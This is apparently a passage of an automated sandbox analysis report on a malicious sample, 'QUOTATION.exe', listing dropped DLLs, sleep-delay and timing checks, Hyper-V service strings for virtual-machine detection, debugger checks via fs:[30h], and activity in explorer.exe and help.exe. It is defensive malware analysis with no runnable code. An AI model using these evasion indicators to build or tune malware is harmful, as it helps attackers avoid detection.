          Source: C:\Windows\SysWOW64\help.exe TID: 3320Thread sleep count: 107 > 30
          Source: C:\Windows\SysWOW64\help.exe TID: 3320Thread sleep time: -214000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\QUOTATION.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Alswith\Peroxidisement\Foresprges87\SolutionExplorerCLI.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.Security.Cryptography.X509Certificates.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\maintenanceservice2.exeJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\percentile.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\libpkcs11-helper-1.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\libdatrie-1.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761763 rdtsc
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877
          Source: C:\Users\user\Desktop\QUOTATION.exeAPI coverage: 0.9 %
          Source: C:\Windows\SysWOW64\help.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_004062DD FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\QUOTATION.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\QUOTATION.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData\Local
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData\Local\Microsoft
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
          Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: explorer.exe, 00000009.00000003.4737750627.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4742907497.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035943972.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4746888738.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6462913242.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.0000000010AD1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:\x1"S
          Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: QUOTATION.exe, 00000008.00000003.4189935994.000000000347B000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000347B000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4313926438.0000000003418000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4925755619.0000000010A13000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4923558287.0000000010A13000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6308723662.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6313657253.0000000010A15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747263289.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8033791122.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035395623.0000000010A15000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: QUOTATION.exe, 00000008.00000003.4189935994.000000000347B000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000347B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~L
          Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_6F601A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33761763 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E372 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E372 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E372 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E372 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A0371 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A0371 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374237A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372B360 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372B360 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372B360 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372B360 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372B360 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372B360 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E363 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E363 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E363 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E363 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E363 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E363 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E363 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E363 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375A350 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33718347 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33718347 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33718347 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F3336 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33758322 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33758322 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33758322 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371E328 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371E328 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371E328 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374332D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373E310 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373E310 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373E310 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375631F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33719303 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33719303 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A330C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A330C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A330C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A330C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DF30A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337533D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337543D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AE3DD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A43D5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371E3C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371E3C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371E3C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371C3C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337263CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379C3B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337293A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337293A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374A390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374A390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374A390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33721380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33721380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33721380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33721380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33721380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373F380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373F380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373F380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373F380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373F380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373F380 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DF38A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B273 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B273 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371B273 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B327E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B327E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B327E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B327E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B327E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B327E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DD270 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379D250 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379D250 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E124C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E124C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E124C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E124C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DF247 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374F24A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33740230 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A0227 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A0227 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A0227 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375A22B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375A22B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375A22B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371821B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AB214 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AB214 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371A200 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337302F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337302F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337302F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337302F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337302F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337302F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337302F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337302F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337172E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372A2E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337282E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337282E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337282E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337282E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371D2EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371D2EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337432C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F32C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371C2B0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FB2BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FB2BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FB2BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FB2BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DF2AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E92AB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337442AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337442AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337192AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33727290 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33727290 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33727290 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379E289 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33726179 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3377717A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3377717A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375716D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F3157 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F3157 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F3157 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375415F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B314A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B314A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B314A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B314A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F5149 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371A147 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371A147 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371A147 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DF13E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AA130 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33757128 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33757128 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33750118 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374510F mov eax, dword ptr fs:[00000030h]
